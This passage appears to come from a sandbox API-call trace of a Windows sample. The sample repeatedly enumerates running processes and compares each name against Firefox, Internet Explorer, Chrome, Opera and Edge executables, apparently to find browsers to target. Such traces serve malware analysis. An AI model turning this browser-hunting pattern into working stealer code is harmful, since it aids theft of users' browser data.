(lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0238.122] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0238.122] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0238.122] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0238.122] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.122] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.122] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0238.122] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0238.122] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0238.122] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0238.122] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.122] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.123] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0238.123] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0238.123] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0238.123] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0238.123] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.123] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.123] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0238.124] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0238.124] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0238.124] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0238.124] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.124] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0238.124] CloseHandle (hObject=0xe8) returned 1 [0238.124] Sleep (dwMilliseconds=0x3e8) [0239.149] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0239.150] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.151] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0239.151] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0239.151] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0239.151] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0239.151] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0239.151] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0239.151] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0239.151] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0239.151] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0239.151] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0239.151] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0239.151] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0239.152] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0239.152] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0239.152] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0239.152] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0239.152] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.152] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0239.153] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0239.153] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0239.153] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0239.153] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0239.153] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.153] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0239.153] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0239.153] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0239.153] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0239.153] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0239.153] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.153] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0239.154] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0239.154] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0239.154] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0239.154] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0239.154] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.154] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0239.154] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0239.154] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0239.154] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0239.154] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0239.154] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.155] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0239.155] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0239.155] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0239.155] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0239.155] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0239.155] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.155] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0239.156] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0239.156] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0239.156] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0239.156] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0239.156] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.156] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0239.156] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0239.156] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0239.156] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0239.156] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0239.156] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.156] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.157] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0239.157] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0239.157] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0239.157] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0239.157] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.157] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.157] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0239.157] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0239.157] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0239.158] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0239.158] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.158] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.158] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0239.158] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0239.158] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0239.158] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0239.158] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.158] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.159] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0239.159] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0239.159] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0239.159] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0239.159] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.159] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.159] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0239.159] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0239.159] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0239.159] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0239.159] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.159] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0239.160] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0239.160] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0239.160] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0239.160] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0239.160] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.160] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.160] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0239.160] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0239.160] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0239.160] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0239.160] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.161] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.161] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0239.161] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0239.161] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0239.161] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0239.161] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.161] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0239.162] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0239.162] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0239.162] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0239.162] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0239.162] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.162] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0239.162] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0239.162] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0239.162] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0239.162] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0239.162] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.162] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0239.163] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0239.163] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0239.163] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0239.163] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0239.163] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.163] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.163] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0239.163] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0239.163] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0239.163] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0239.163] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.163] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0239.164] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0239.164] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0239.164] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0239.164] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0239.164] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.164] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0239.164] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0239.164] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0239.165] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0239.165] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0239.165] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.165] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0239.165] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0239.165] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0239.165] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0239.165] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0239.165] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.165] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0239.166] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0239.166] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0239.166] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0239.166] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0239.166] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.166] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0239.166] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0239.166] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0239.166] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0239.166] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0239.166] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.166] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0239.167] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0239.167] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0239.167] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0239.167] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0239.167] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.167] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0239.167] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0239.167] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0239.167] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0239.167] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0239.168] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.168] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0239.168] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0239.168] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0239.168] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0239.168] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0239.168] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.168] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0239.169] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0239.169] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0239.169] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0239.169] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0239.169] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.169] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0239.169] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0239.169] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0239.169] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0239.169] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0239.169] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.169] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0239.170] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0239.170] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0239.170] lstrcmpiA (lpString1="birth bean.exe", 